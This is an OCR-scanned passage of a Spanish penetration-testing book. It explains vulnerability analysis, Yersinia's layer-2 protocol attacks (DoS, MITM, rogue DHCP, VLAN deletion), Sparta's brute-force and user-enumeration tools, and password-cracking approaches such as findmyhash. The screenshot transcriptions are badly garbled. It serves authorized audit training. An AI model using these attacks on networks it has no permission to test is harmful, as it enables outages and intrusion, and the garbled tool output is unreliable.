que se quiere dar a un sistema. Tener acceso a un servidor web de una intranet puede 
ser o no una vulnerabilidad, segün la política de acceso que tenga ese servidor; y 
acceder a determinada información puede ser una vulnerabilidad o no; depende de 
qué condiciones se deben dar para que alguien tenga acceso a esa vulnerabilidad. 


Por poner ejemplos concretos: si con los privilegios de un contable 
encontramos una forma no comun de acceder a la contabilidad, no estamos 
encontrando una vulnerabilidad. Si encontramos una forma de hacer cosas que ya 
puede hacer root en una máquina, pero que es necesario ser root para poder hacerlas, 
no es una vulnerabilidad. Si encontramos una forma de lanzar comandos arbitrarios en 
una máquina en local pero que requiere acceso local a la máquina, y los comandos se 
lanzan con privilegios iguales o inferiores a los del usuario, no es una vulnerabilidad. 
Encontrar y notificar esas vulnerabilidades puede hacer quedar bien al auditor ante 
gente que no sepa de lo que se habla -hasta que alguien le explique la verdad-; pero 
nos hará quedar como idiotas ante los actores e interesados de la empresa cliente que 
realmente entiendan de lo que nosotros estamos hablando. 


Por eso, para poder analizar las vulnerabilidades es imprescindible haber 
hecho antes "los deberes", en la fase de recolección de información. La recolección 
de información nos permitirá: 
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У No notificar como vulnerabilidades cosas que no lo son. Aunque ojo 
con esto, porque algunas cosas que descubramos y que es cierto que no 
podemos notificarlas como vulnerabilidad, probablemente nos sean ütiles 
para hacer reconocimiento. 


V Identificar procesos no conocidos por gerencia. Aquí es dónde las cosas se 
ponen interesantes. S1 encontramos redes Wifi que no nos han notificado, 
servidores que en teoría no existen, usuarios que no existen, la mayor parte de 
las veces no se trata de intrusiones ya realizadas —y no debemos notificarlas 
como tales-. Debemos trabajar con la hipótesis de que un empleado de la 
empresa haya puesto eso así por alguna razón más o menos legítima. Y esto 
es interesante, ya que se puede deber a problemas de comunicación; pero 
habitualmente se debe a ñapas por falta de tiempo o de material, atajos para 
tareas muy repetitivas de personal técnico, o a concesiones a excentricidades 
de cargos directivos. Es el caso, por ejemplo, del directivo que exigen tener 
su AP para su tablet y que no pasa por utilizar identidades ni certificados. 
Es el caso del directivo que exige tener una forma de acceder a algo sin 
tener la clave. Es el caso del empleado ludita que dice que el no trabaja 
si no tiene algün tipo de acceso de forma directa y sin autentificación, y 
gerencia ha tenido o ha querido ceder. Es el servidor de desarrollo en los que 
los programadores lo han dejado todo abierto, o han exigido que esté todo 
abierto, para no "perder" tiempo cada vez que quieran probar algo. Es el caso 
en el que cazas” el fichero privado DSA o RSA de uno de los de sistemas 
porque está en una máquina poco protegida, y utilizándola puedes entrar por 
ssh en todos los servidores de la empresa como root. 


Р Identificar cosas que faltan. Si vemos que falta un mecanismo 
indispensable para los procesos productivos de la empresa, debemos 
sospechar que o hay una йара no descubierta aun, o alguien está teniendo 
que hacer el trabajo de otro. Con lo cual puede que no lo haga con el 
interés y el detalle de la persona que debería hacerlo. 


V Pistas e indicios sobre dónde están las vulnerabilidades reales. Podemos 
analizar defectos en las arquitecturas, sistemas operativos obsoletos, 
sistemas operativos con una gestión pobre de la seguridad. Habitualmente 
si hemos hecho una auditoría 27000 con anterioridad, sabemos 
perfectamente lo que cumple la letra de la norma, pero no el espíritu; y ya 
podemos ir de cabeza a dónde están los problemas. 


Toda esa información, junto con saber qué versión de qué está instalado en qué 
máquinas, nos permite en principio un planteamiento de análisis de vulnerabilidades 
de entrada: utilizar las vulnerabilidades conocidas de las versiones instaladas de las 
aplicaciones, así como los defectos y las puertas traseras que encontremos después 
de la recolección de información. 
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Entrar en detalle en explicar vulnerabilidades está fuera de los objetivos 
de este libro -y además requeriría un volumen completo solo para enumerarlas-. 
Además, entender cómo funcionan las vulnerabilidades requieren con frecuencia 
un nivel alto de compresión de las tecnologías involucradas, y cualquier cosa que 
expliquemos relativas a vulnerabilidades concretas y conocidas de aplicaciones 
actuales se va a quedar obsoleta antes de final de айо. Por ello, en este libro nos 
vamos a centrar en las herramientas clave para análisis de vulnerabilidades, y en 
las tres grandes familias de vulnerabilidades que son razonablemente estables en 
el tiempo: los ataques a contrasefias, los relativos a las redes Wifi, y los relativos 
a las aplicaciones web. Cada uno de estos puntos tendrá su propio capítulo, que 
trataremos por separado. 


Dentro de las utilidades más importantes para buscar vulnerabilidades, 
tenemos dos aplicaciones estrella: nmap -especialmente con los scripts que hemos 
estudiado de ejemplo- y Metasploit. De nmap ya hemos hablado, y del análisis de 
vulnerabilidades con Metasploit hablaremos más adelante en un capítulo específico 
de Metasploit. Además de estas dos herramientas, ahora veremos las herramientas 
comunes que nos serán de utilidad. 


(D IMPORTANTE 


Las aplicaciones que vamos a describir funcio-nan, y funcionan bien. Utilizarlas contra 
una máquina sin autoriza-ción explícita del dueño de la máquina y de los posibles 
perjudicados es delito en el marco penal espafiol, y se castiga con la cárcel. El autor 
de este libro se exime de toda responsabilidad sobre el uso de estas aplicaciones. Te 
recomiendo, por lo tanto, que tengas cuidado con es-tas aplicaciones. 





Este capítulo no es demasiado extenso; ya que las herramientas de recopilación 
de información también hacen análisis básico de vulnerabilidades; y las herramientas 
específicas de análisis básico de vulnerabilidades las vemos en capítulos posteriores 
ya específicos de temas concretos de interés. Nos centraremos en este capítulo en 
herramientas que no son encuadrables en otros capítulos, por lo tanto. 


Se quedan también fuera de este capítulo -y del libro- herramientas 
como arpspoof, dnsspoof y sslstrip, ya que poder explotar de forma eficiente el 
envenenamiento de ARP, DNS o SSL son técnicas que requieren mucho tiempo para 
explicar; y aunque se pueden hacer pruebas de concepto bastante espectaculares, la 
explotación práctica requiere suplantar servidores, y bastantes conocimientos en lo 
que estamos haciendo. Dada las restricciones espaciales del libro, hemos decidido 
cortar por aquí, y centrarnos en ataques más prácticos para análisis y auditorías con 
los presupuestos que se suelen manejar. Pero debemos recordar que las técnicas de 
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envenenamiento son muy potentes y espectaculares, por lo que si nos interesa el 
tema de las pruebas de intrusión y quieres seguir con el tema después de terminar de 
leer el libro, quizás es por dónde deberías continuar. 


4.1 YERSINIA 


Yersinia es una excelente aplicación desarrollada por un par de espanoles 
- Alfredo Andrés Omella y David Barroso Berrueta-. Su función básica es explotar 
vulnerabilidades conocidas de distintos protocolos de red; cubriendo un porcentaje 
muy importante de los protocolos de red comunes en entornos productivos. 


Yersinia es capaz no solo de validar que un ataque concreto funciona, sino 
que también es capaz de ejecutarlo. 


Debemos tener en cuenta algo muy importante de cara a utilizar Yersinia de 
forma indiscriminada: esta aplicación no solo valida si existe una vulnerabilidad, 
sino que también la ejecuta. Yersinia puede tumbar la red, y dejar “flipados” 
routers, exigiendo que sean reiniciados. No ejecutes esta aplicación nunca si no 
tienes permiso expreso para hacerlo, y entiendes el dano que puedes causar al 
lanzarla. A ningün cliente le va a hacer gracia que le pares la red informática 
entera y que tenga que reiniciar todos los elementos de red, especialmente si no 
está avisado que puedes hacerle esto. 


Existen tres modos de uso; el uso desde línea de comandos, que se lanza con 
la sintaxis: 


yersinia protocolo -attack ataque opcionesataque 


ed as the default опе 
ding DISCOVER p 


р the attack <*> 





Donde protocolo corresponde con el protocolo que vamos a atacar, ataque 
con un nümero que identifica al ataque, y que obtenemos en la página del manual 
-man- de yersinia, y opcionesataque son una serie de opciones del ataque que 
dependen del ataque, y son específicas para cada uno de estos. 


El modo de línea de comandos es el más cómodo de utilizar porque es 
fácilmente scripteable, pero no todos los ataques funcionan desde línea de comandos. 
Es, por lo tanto, útil; pero no será el que utilicemos con más frecuencia. 
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Otro modo de lanzar Yersinia es utilizando ncurses: 
yersinia -l 
Obteniendo la pantalla de Yersinia en consola de texto, que corresponde con: 


yersinia 0.7.3 by Slay € tomac - STP mode ————— —— — — — — — — — — — — 03: 22:18] 
RootId BridgeId Port Iface Last seen 


Warning: interface o 
ault one 


Total Packets: 0 STP Packets: MAC Spoofing [X] 





En mi opinion, Yersinia bajo consola con ncurses -el modo cuando se 
lanza con la opción I- es el modo que mejor funciona. De hecho, a diferencia de 
los otros modos, todos los ataques desde este modo funcionan perfectamente. Es 
un modo muy práctico y fácil de utilizar, tanto en local como en remoto a través de 
consola ssh. Aunque el utilizar las ncurses hace difícil su scripteo si no se conocen 
las herramientas apropiadas, esto no significa que no se pueda incluir en scripts; solo 
que es necesario hacer uso de herramientas específicas para scriptear aplicaciones 
que sean más potentes, como es el caso del uso de expect. 


Cuando entremos en la aplicación en el modo de consola con ncurses, después 
de arrancar la aplicación pulsamos enter, y accederemos a la pantalla principal. 


Desde la pantalla principal ya tenemos acceso a todas las características de 
Yersinia; aunque como no usa los cursores en menus comunes de navegación, puede 
ser confuso el interfaz si no conocemos las teclas. Podemos ver las opciones y las 
teclas que las lanzan pulsando la tecla h; al hacer esto, obtendremos la siguiente 
pantalla: 
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— RootId í BridgeId ч Iface Last seen 


Yersinia 0.7.3 
File Protocols Actions Options Help 


e > = uo c * [x | 


Launch attack Edit interfaces Load default List attacks Clear stats Capture Edit mode Exit 


Protocols Packets i СОР DHCP 8021Q 8021X DTP HSRP ISL MPLS STP VIP Yersinia log 


MessageType Interface Count Last seen 


Field Value Description 


Dynamic Host Configuration Protocol 

Source MAC 02: 48: 33: 66: 1 Destination MAC FF:FF:iFE:FFiFE:FF Extra 

SIP 0.0.0. 155. 255. 255.255 SPort 68 DPort 67 

Op 1 1 o6 00 Xid 00009869 Secs 0000 
с! .D.O.t ).0.0.( SI ).0.0.0 GI 0.0.0. 


сн 


03:18:25 
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Que lanzamos con: 
yersinia -G 


En la fecha en la que se escribe esta documentación, los protocolos que 
cubre Yersinia son: 


Y IEEE 802.10 

Y IEEE 802.1X 

V Cisco Discovery Protocol (CDP) 

Y Dynamic Host Configuration Protocol (DHCP) 
Y Dynamic Trunking Protocol (DTP) 

Y Hot Standby Router Protocol (HSRP) 

Y Inter-Switch Link Protocol (ISL) 

Y Spanning Tree Protocol (STP) 

Y VLAN Trunking Protocol (VTP) 


Los ataques y las opciones contra IEEE 802.1Q son: 


Choose attack ооо 
CDP DHCP 80210 8021Х DTP HSRP ISL MPLS STP VTP 
Choose attack 


Yersinia 0.7.3 


Description Dos 
t © sending 802.10 packet GB x q 
D sending 802.1Q double enc, packet apture Edit mode Exit 
© sending 802.10 arp poisonin: м 
" Ре " RP ISL MPLS STP VTP Үегѕіпіа од 


Interface Count Last seen 











Field Value Description | 


IEEE 802.19 
| Source MAC СЕ:5С:49:19:32:ВЕ| Destination МАС FE:FF:FF:FF:FF:FF| 
| МАМ |1 Priority |7 CFI  CO| L2Protel 0800) МАМ 2 


L2Proto2 0800 5Р 10.0.0.1 | DstiP (255.235.255.255) ІР Prot 


Payload — |YERSINIA 
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Los ataques y las opciones contra IEEE 802.1X son: 


Choose attack ооо 


CDP DHCP 8021Q 802.1Х DTP HSRP ISL MPLS STP VIP 
| Choose attack 


Description Dos 
(1) sending 802.1X packet O; М 


м 


O Mitm 802.1X with 2 interfaces ptu! Edit mode 


Yersinia 0.7.3 


RP ISL MPLS STP VIP Yersinialog 


ce Count Lastseen 








Field Value Description 





IEEE 802.1X 
| Source МАС CC:58:55:62: 87:42 Destination MAC [01:80:c2:00:00:03| 


[Ver (1 Type [oo EAPCode [02 EAPId [oo EAPType oi 





| EAPInfo | Andrea Amati 








Los ataques y las opciones contra CDP son: 


Choose attack ооо 


СОР DHCP 80210 8021Х DTP HSRP ISL MPLS STP VTP 

Choose attack 
Description DoS 
‘© sending СОР packet x х | 
O flooding CDP table Y ph Edit mode Exit 
(© Setting up a virtual device 


Yersinia 0.7.3 











Field Value Description 


Cisco Discovery Protocol 


Source MAC 06:45:8B:6B:41:56 Destination MAC 01:09:0c:CC:CC:CC| xta 


Version |o ТП | вд) Checksum [0000 
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Los ataques y las opciones contra DHCP son: 


eoo 
ISL MPLS STP VIP 


Choose attack 


CDP DHCP 8021Q 8021x DTP HSRP 
Choose attack 


Yersinia 0.7.3 








DoS 


Description 

© sending RAW packet 

© sending DISCOVER packet 
© ereating DHCP rogue server 
(2 sending RELEASE packet 


м 
Y pture 


RP 151 MPLS 


Y 
Last seen 


Field Value Description 


* 
Edit mode 


Exit 


STP VTP Yersinia log 








Dynamic Host Configuration Protocol 
Source MAC 02: 48; 33:66; 02; 51 Destination MAC 
БР [0.0.0.0 ОР — 255, 255. 255.255 
Юр [ol  Htype HLEN Hops 
ci осоо — 0.0.00 | 
KH  02:48:33:66:02:51 | 





06 [oo 


5! 


o1| 
ү! 





FF: FF: FF; FF; FR ЕЕ Extra 

sPot 68 | DPot |67 
Xid | 00009663 Secs 
GI 


осоо 


0.0.0.0 


0.0.0.0 














Los ataques y las opciones contra DTP son: 


Choose attack ооо 
CDP DHCP 80210 802.1Х DTP HSRP ISL MPLS STP VIP 
Choose attack - 
Description 
© sending DTP packet 
J enabling trunking 


Des 





Field Value Description 


Yersinia 0.7.3 


Exit 


v 


apture Edit mode 


RP ISL MPLS STP VTP Yersinia log 





Count Last seen 





Dynamic Trunking Protocol 


Source МАС OC:7C:EB:46:05:95| 
loz 


| 


Version Neighbor-ID 


Domain 





Destination MAC 


OC7CES4EDS95 





01:00:0C:CC:CC:CC| 


Status оз Туре AS 
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Los ataques y las opciones contra SRP son: 


Choose attack ооо 
СОР DHCP 80210 802.1Х DTP HSRP ISL MPLS STP VIP 
Choose attack < Yersinia 0.7.3 
Description DoS 
w 


le) sending raw HSRP packet 
J becoming ACTIVE router p Edit mode Exit 
©) becoming ACTIVE router (MITM) 


ISL MPLS STP VTP Yersinia log 





Hot Standby Router Protocol 
Source MAC DA: 1E:87: 41:06:23 Destination MAC | 01:00: 5E: 00:00:02| 


SIP 46.177.65.242 DIP 224.0.0.2 | SPort 1565 DPort | 1985 
100] Opcode [00] state [00] Hello [03 Hold [oa] Priority 


Reserved со) Auth | cisco 





= 


Version 
VIP 80. 126.215. 171 


| 


Group D 





Los ataques y las opciones contra ISL son: 


Choose attack ооо 
CDP DHCP 802.10 8021x DTP HSRP ISL MPLS STP VIP 
ES Yersinia 0.7.3 
¡Choose attack 


DescriptionDoS 


ount Last seen 








Field Value Description 








Inter-Switch Link Protocol 


05:Е1:45:75:08:51 01:00:0с:00:00:00] 


Destination МАС 


Source MAC 
SNAP ОЈСОАА HSA 009000 VLAN 


o Len 0000 





Type O User 
Res 0000 Src IP 10.0.0.1 


DstIP — 255.255.255.255| Proto 01 
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Los ataques y las opciones contra MPLS son: 


Choose attack ооо 


CDP DHCP 802.10 802.1X DTP HSRP ISL MPLS STP VIP 
Choose attack 


Yersinia 0.7.3 





Description Dos 
12) sending TCP MPLS packet 
2 sending TCP MPLS with double header 


\ sending UDP MPLS packet ке BE MAS 
\ sending UDP MPLS with double header E Seas 


\ sending ICMP MPLS packet 
| sending ICMP MPLS with double header 


Count Last seen 


Field Value Description 





MultiProtocol Label Switching- = —— = 
Source MAC 04:08:20: 12: A9: 75 Destination MAC FPIFP:IFFIFP:IFE:FB 


шец о Expl О | Botomd 1 mı o 
Label2 о | крг lo Bottom2 (0) mz [o 
$гїР |10.0.0.1 SrePort 665 | DstP |10.0.0.2 
Payload YERSINIA | 











Los ataques y las opciones contra STP son: 


Choose attack ооо 


СОР DHCP 80210 8021Х DTP HSRP ISL MPLS STP VIP 
Choose attack- - A Yersinia 0.7.3 
Description Dos 
© sending conf BPDU 
© sending tcn BPDU 
© sending conf BPDUs 
© sending tcn BPDUs 
O Claiming Root Role 
\ Claiming Other Role 
© Claiming Root Role with МТМ 37 








Last seen 











Cancel 


Field Value Description 





Spanning Tree Protocol 
Source MAC (A323: 16; 02; FF:08| Destination МАС 01:80;C2;00;00;00 


[во Flags 00] Rootld 5080.760FOE14AC58  Pathcost 


Id 0000 Ver 00] Туре 
Bridgeld  CRO9.E7CDOO117C4A| Port поо Age |0000] Max 0014 Hello 
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Los ataques y las opciones contra VTP son: 


Choose attack 00 


CDP DHCP 802.1Q 802.1X ОТР HSRP ISL MPLS STP VIP 
Choose attack 





Yersinia 0.7.3 


Description 005 
(9) sending VTP packet 

© deleting all VTP vlans 4 
©) deleting one vlan Y 
© adding one vlan 

© Catalyst zero day Y 

















Field Value Description 





[VLAN Trunking Protocol - - > 


Source MAC — |02:C2:DC:7F:8E:F3| Destination MAC |01:00:0C:CC:CC:CC| 
jii lol | Code EJ Domain 


| 
MD5 | ODOD0009090209C0COCOCOCOCO000000 | Updater |10.13.58.1 











| ERE а. 
Revision | l | Timestamp | | Start value | 1 


Followers |1 








Sequence [1 | 








03:21:59 








4.2 SPARTA 


Sparta es un interfaz grafico de varios programas —nmap, sslyze, y nikto, 
hydra y nbtscan, y otros muchos-. Mientras que Yersinia es la herramienta para 
analizar redes, y lynis es una herramienta específica para análisis de host en local, 
Sparta es la mejor herramienta para análisis de vulnerabilidades en remoto. 


Lo lanzamos con: 
sparta 


Obteniendo la pantalla: 
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SPARTA 1.0.2 (BETA) - untitled - /root/ 
те Help 


‘Sean Dute 
=== 





Hosts Services Tools Services Scripts Information Notes 
———_ ___ ——— 


Click here to add 
host(s) to scope 
| 




















Si ponemos el cursor en el cuadro izquierdo de la pantalla y pulsamos el 
botón derecho del ratón, podemos añadir tanto redes -en formato similar al del 
nmap-, o hosts. Por ejemplo, si queremos analizar la red 192.168.2.0/24, hacemos: 


Add host(s) to scope o 





IP Range | 192.168.2.0/24 ] 
eg: 192.101.1.0/21 10.14.10 10201 2.3.4 


Y Run nmap host discovery 
v Run staged птар scan 





Sem. Addio эсере | 
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Y pulsamos el botón "Add to scope", apareciendo la pantalla: 


SPARTA 1.0.2 (BETA) - untitled - /root/ 
ға. Help 


San Brute 
— 


Hosts Zerdces Tools Services Scripts information Notes 


.— Click here to add. — | 
host(s) to scope 











Host Start sme 
192.168.2.0/24 14 abr 2016 06:02:26 





Host Start time “End time 
screenshot (80/tcp) 1921682.20 18 abr 201606:03:16  18abr 2016 06:03:16 
screenshot (80/tcp) 192.168.2.2 18 abr 2016 06:03:10  18abr 2016 06:03:10 
screenshot (80/tcp) 19216821 18 abr 2015.06:03:09 — 18abr 2016 06:03:09 


«бее ће (AI 195 1625 111 14 abe 2015 OR a 14 she 2014 O03 08 
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Finalmente obtenemos: 


SPARTA 1.0.2 (BETA) - untitled - /root/ 


Servkes Scripts information Notes mito (Mftcp) 0 screenshot (80/ср) © smtp-enum-wfy (25/tcp) 5 


192168. 2.13 
19216824 
192168215 


Port Protocol 
2 tp 

25 

во 

E 

137 

139 

445 

2049 


Most 
192.168.2.2 
192.16821 
192.1682111 


$45 зда у 5^ 





State Versin 

OpenSSH 6.071 Debian 444702 (protocd 2.0) 
Sendmal 8.14 478.14 A/Debun-4 

lighttpd 1431 

2-4 (REC 9100000) 


Samba smbd 1X (wodgroup: TRANTOR) 
Samba smbd 3.X (wodugroup: TRANTOR) 
2-3 (RPC #100227) 


11111111 


k 


Start time End tme 
148 abr 2016 06:01:30 — 18 abr 2016 06:03:19 
16 abr 2016 06:04:09 18 abr 2016 06:03:09 
168 abr 2016 06:03:03 — 18 abr 2016 06:03:03 


үлүүн Hanh EA READ 0а 


También es posible hacer la verificación directa sobre un host concreto. 
Repetimos los pasos indicando la IP de una máquina, en lugar de una red; y 
obtendremos algo como esto: 


File Help 


Scan Brute 
— 


Hosts Services Tools Services 


Progress 


Port 
22 
25 
B0 
111 
137 


nmap (stage 4) 
smtp-enum-vrfy (25/tep) 
nmap (stage 3) 


ceraanchat (RO/tent 


SPARTA 1.0.2 (BETA) - untitled - /root/ 


Scripts Information Notes nikto (BO/tep) (xi screenshot (80/tep) © — smtp-enum-vrfy (25/tcp) El 


Protocol 
tcp 
tcp 
tcp 
tcp 
udp 
tcp 
tcp 
tcp 


Host 
192.168.2.20 
192.168.2.20 
192.168.2.20 


192 16А 2 20 


State Name Version 
ssh OpenSSH 6.0p1 Debian 4*deb7u2 (protocol 2.0) 
Sendmail 8.14.4/8.14.4/Debian- 4 
http lighttpd 1.4.31 
rpebind 2-4 (RPC #100000) 
netbios-ns Microsoft Windows XP netbios-ssn 
netbios-ssn Samba smbd 3.X (workgroup: TRANTOR) 
netbios-ssn Samba smbd 3.X (workgroup: TRANTOR) 
nfs_acl 2-3 (RPC #100227) 


Start time 


18 abr 2016 05:06:03 Running 


18 abr 2016 05:05:55 Running 


18 abr 2016 05:05:55 18 abr 2016 05:06:03 Finished 
ЛЯ ahr201& 05-05-38 Rah 2016 05:05:46 Finichad 
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En el menú superior, a la derecha de “Scan”, tenemos la opción "Brute". 
Esta opción nos permite lanzar ataques de fuerza bruta contra los distintos servicios 
remotos, tanto para buscar usuarios, como para buscar claves de usuarios. El ataque 
por fuerza bruta solo es interesante si tenemos un diccionario -o al menos, un listado 
de usuarios- para comenzar. La forma de obtener esto es mediante las herramientas 
específicas por protocolo de análisis de vulnerabilidades. Hay muchas, y no podemos 
entrar en detallarlas todas por razones tanto de tiempo como espacio. Pero veremos 
cómo utilizarlas. 


Para utilizar una herramienta específica, nos ponemos en un servicio, 
pulsamos el botón derecho, y nos aparecen todas las herramientas que se pueden 
utilizar contra ese servicio en concreto. Por ejemplo, si seleccionamos el servicio de 
correo y seleccionamos después la herramienta smtp-enum-vrfy, obtendremos: 

SPARTA 1.0.2 (BETA) - untitled - /root/ 
File Help 


Scan Brute 


Hosts Services Tools [ dHHHHHHHHE 


en z 192.168.2.20: ROOT exists 
Tool dt TX 192.168.2.20: avahi exists 
dirbuster |192.168.2.20 587/tcp 192.168.2.20; backup exists 
192.168.2.20: bin exists 
hydra 192.168.2.20 asitep 192.168.2.20: daemon exists 
nbtscan 192.168.2.20: ftp exists 
192.168.2.20: gnats exists 
nikto 192.168.2,20; games exists 
192.168.2.20: hplip exists 
192.168.2.20: haldaemon exists 
192.168.2.20: irc exists 
192.168. 2.20: libuuid exists 
192.168.2.20; list exists 
192.168.2.20: lp exists 
192.168.2.20: mail exists 
192.168.2.20: man exists 
192.168.2.20: messagebus exists 
192.168.2.20: naws exists 


screenshooter 








Host Start time End time 
webslayer (80/tcp) 192.168.2.20 18 abr 2016 05:13:13 18 abr 2016 05:13:14 Crashed 
dirbuster (BO/tcp) 192.168.2.20 18 abr 2016 05:12:16 18 abr 2016 05:13:03 Finished 
nbtscan (137/udp) 192.168.2.20 18 abr 2016 05:11:31 18 abr 2016 05:11:32 Finished 


hudra (Ее) 192 168 2 20 TR ahr IMA 05:17026 IR ahr 2018 05:10426 Finiched 





Es decir, un listado de usuarios que existen en la mdquina; por lo que 
ya tenemos por dónde comenzar. Otros ejemplos de herramientas los tenemos 
si pulsamos sobre el protocolo SMB y seleccionamos la herramienta nbtscan; 
obteniendo algo como: 
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SPARTA 1.0.2 (BETA) - untitled - /root/ 
File Help 


Scan Brute 





Hosts Services Tools Name Service Type 

Tool Lus. ies ALMACEN Workstation Service 
dibosiar ALMACEN Messenger Service 
ALMACEN File Server Service 
hydra ALMACEN Workstation Service 
ALMACEN Messenger Service 
ALMACEN File Server Service 
nikto 3:31. MSBROWSE...-3 Master Browser 
screenshooter 
TRANTOR Master Browser 
smtp-enum-vrfy TRANTOR Browser Service Elections 
sslyze TRANTOR Domain Name 
TRANTOR Master Browser 
webslayer TRANTOR Browser Service Elections 
TRANTOR Domain Name 





Adapter address: 00:00:00:00:00:00 





Tool Host Start time End time 
webslayer (80/tcp) 192.168.2.20 18 abr 2016 05:13:13 18 abr 2016 05:13:14 Crashed 
dirbuster (BO/tcp) 192.168.2.20 18 abr 2016 05:12:16 18 abr 2016 05:13:03 Finished 
nbtscan (137/udp) 192.168. 2,20 18 abr 2016 05:11:31 18 abr 2016 05:11:32 Finished 


hudra Siten 197 168 2 20 TR ahr 2016 051096 TA ahr 2016 053028 Finiched 











También podemos buscar ficheros concretos en la aplicación web que no 
sean directamente accesibles a través de enlace. Seleccionamos el servicio web, y 
activamos la herramienta dirbuster, obteniendo: 
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File Help 


Scan Brute 
а OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing 


Hosts Se File Options About Help 


Naj Targat URL Cag htt p://example.com 807) 
summ http://192.168.2.20:80/ 
mountd Work Method ©) Use GET requests only © Auto Switch [HEAD and GET) 


netblos-ns 
Number of Threads == 10 Threads Go Faster 


netbios-ssn 


Infs_acl Select scanning type: +) List based brute force ) Риге Brute Force 


File with list of dirsffiles 
nlockmgr 





© Browse || @ List into, 
|rpcbind 





ch t |azA-20.9%20 -| v lengt п | wee 


ssh Select starting options: » Standard start point URL Fuzz 
>] Brute Force Dirs [v] Be Recursive Dir to start with П 


smtp 














| iv] Brute Force Files — Use Blank Extension File extension [php 


JRL to fuzz - (test. htmi?ur lir). asf 





Log 








Progress 
шит, 


ECJ 


Please complete the test details 





E hydra (25/tcp) 192.168.2.20 18 abr 2016 05:10:26 18 abr 2016 05:10:26 Finished 


ЕЕЕ! 192 142 2 >п AR ahr 2014 05:10:14 TR ahr IMA NSIMI Finichod 
| 





Seleccionamos las opciones de busqueda, un fichero con los directorios y 
ficheros que queremos buscar, y lanzamos la busqueda. 


Como estas, tenemos decenas de aplicaciones que podemos lanzar desde 
Sparta. Eso hace a Sparta una herramienta fundamental para hacer un test de intrusión 
de forma rápida y eficiente. Podríamos dedicar medio centenar de páginas a detallar 
todo lo que acompaña a Sparta, pero con lo visto aquí, lo recomendado es probar la 
aplicación y “jugar” un poco con ella en una red local propia, para ver qué se puede 
llegar a hacer con esta herramienta. 


4.3 PROBANDO TODO LO APRENDIDO 


Una forma que tenemos de probar lo aprendido en este capítulo es empleando 
la imagen Metasploitable, que se puede descargar de la Web: 


https://information.rapid7.com/metasploitable-download.html 


Y que nos permite verificar todo lo que hemos visto hasta ahora contra un 
sistema que tenga exploits documentados. 





ATAQUES A CONTRASENAS 


Cuando la gente piensa en ataques informáticos, la gente piensa en un 
monitor de fósforo verde, con una fuente grandísima, en la que se prueban muchas 
contraseñas, y van apareciendo los números uno a uno. Hasta que cuando solo falta 
uno, llega el "bueno" y para la operación. 


Eso es una versión burda y Hollywoodense de un ataque de contrasenas por 
fuerza bruta. Y no, tal como está planteado no funciona. Y no funciona porque en las 
películas las claves se atinan "dígito a dígito", y cada vez que aciertas uno, estás más 
cerca de la clave. En el mundo real, o atinas la clave entera, o no hay nada que hacer. 


Sin embargo, sí hay atajos a la fuerza bruta: la ingeniería social es el primer 
atajo, y más importante. Porque, de entrada, alimenta a todos los demás. Fechas 
de nacimiento, nombres de hijos o de mascota. O peor: post-its con la clave en el 
monitor, o debajo del teclado; esas claves "tan seguras" porque las hacen los de 
sistemas con muchos caracteres, números y símbolos. Que el usuario no es capaz 
de recordar, y mantiene de forma sistemática anotada en un papel. Un auditor de 
seguridad con buena memoria, recordando una clave que ha visto solo una vez en un 
post-it, pasa sin problemas el problema de la autentificación. Aquí un buen curso de 
memotécnia es clave. 


Existe una segunda forma: el ataque por diccionario de claves. Básicamente 
es un ataque por fuerza bruta dirigido; es decir, en el que no se va a ciegas, sino 
que se utiliza de entrada una serie de palabras basadas en diccionarios de idiomas, 
nombres, expresiones regulares de fechas, algunas formas geométricas comunes de 
teclado e incluso todo aquello que podamos recabar a través de ingeniería social. 
Por este método caen rápido los usuarios con clave paco62 -historia real-, o 
manololuisa65 -historia real-. Claves más retorcidas también caen; pero las claves 
realmente complicadas, no caen por este sistema. 
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Una tercera forma es el ataque por rainbow tables. Una rainbow table es, 
sobresimplificando, un diccionario de claves en el que en lugar de almacenar las claves 
probables, almacenamos la traducción de la clave al mecanismo de almacenamiento o 
de transmisión precomputada. Esto suena más confuso de lo que realmente es. Cuando 
se almacenan usuarios y claves, no se almacenan las claves sin cifrar. Se almacenan 
cifradas a través de una función hash, como pueda ser MD5 o SHA. Este cifrado es 
lento; lo que hace que el ataque por diccionario de claves no sea factible en tiempo 
razonable. La solución es precomputar los hashes de un diccionario. Este mecanismo 
funciona si en algún momento tenemos acceso a las claves cifradas. Pero hay forma de 
limitar la eficiencia de este ataque: utilizando salts, que básicamente es un componente 
aleatorio que se le anade a la clave antes de pasarle el hash. En la práctica, ralentiza 
sensiblemente la autentificación legítima, pero por debajo de lo perceptible de un 
humano. Si se intenta un ataque por diccionario de claves, se dispara el coste en tiempo. 
Y sise ataca por rainbow tables, se dispara el coste en espacio. 


Finalmente, la cuarta y ültima forma es por vulnerabilidades específicas de la 
aplicación o el protocolo. Aquí va a dar igual que haya o no salt, y lo complicada que 
sea la contrasena. Si pillamos un servidor al que no le han parcheado el Heartbleed, 
por poner un ejemplo, vamos a terminar entrando por mucho SSL y clave retorcida 
que nos pongan. 


Como veremos más adelante, los ataques a redes Wifi se terminan reduciendo 
a ataques a contrasenas. Sin embargo, vamos a ver algunas herramientas que permiten 
hacer ataques locales y remotos a contrasenas. 


5.1 FINDMYHASH 


Findmyhash es un script en Python especializado en calcular de forma 
eficiente hashes. Si tenemos acceso a la tabla de hashes —por ejemplo, porque alguien 
se ha dejado un MySQL sin clave en una máquina de prueba- podemos utilizar 
findmyhash scripteado para encontrar la clave concreta de algün usuario de MySQL. 
Si encontramos la clave de un usuario utilizado por una aplicación, podemos cantar 
bingo. Y si hemos encontrado una clave de un usuario, es probable que o esa clave o 
una parecida la utilice para su cuenta ssh. 


Los algoritmos de hash que soporta findmyhash son: 


У MD4 según RFC 1320 

У МР5 según RFC 1321 

Y SHA1 según RFC 3174 y FIPS 180-3 
Y SHA224 según RFC 3874 y FIPS 180-3 
Y SHA256 según FIPS 180-3 
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y SHA384 según FIPS 180-3 

Y SHA512 según FIPS 180-3 

Y RMD160, según RFC 2857 

Y MYSQL, en concreto los hashes de las versiones de MySQL 3, 4 y 5 

Y LDAP МР5; es decir, LDAP cifrado con MD5 Base64 

Y LDAP SHAI; es decir, LDAP cifrado con SHA1 Base64 

Р CISCO], que corresponde con las claves cifradas de Cisco IOS 7 

У JUNIPER, que corresponde con las claves cifradas de hardware de red de 
Juniper Networks 

Y GOST, según RFC 5831 

Y WHIRLPOOL, según ISO/TEC 10118-3:2004 

У LM, que es uno de los hashes de Windows 

Y NTLM, que es el otro de los hashes de Windows 


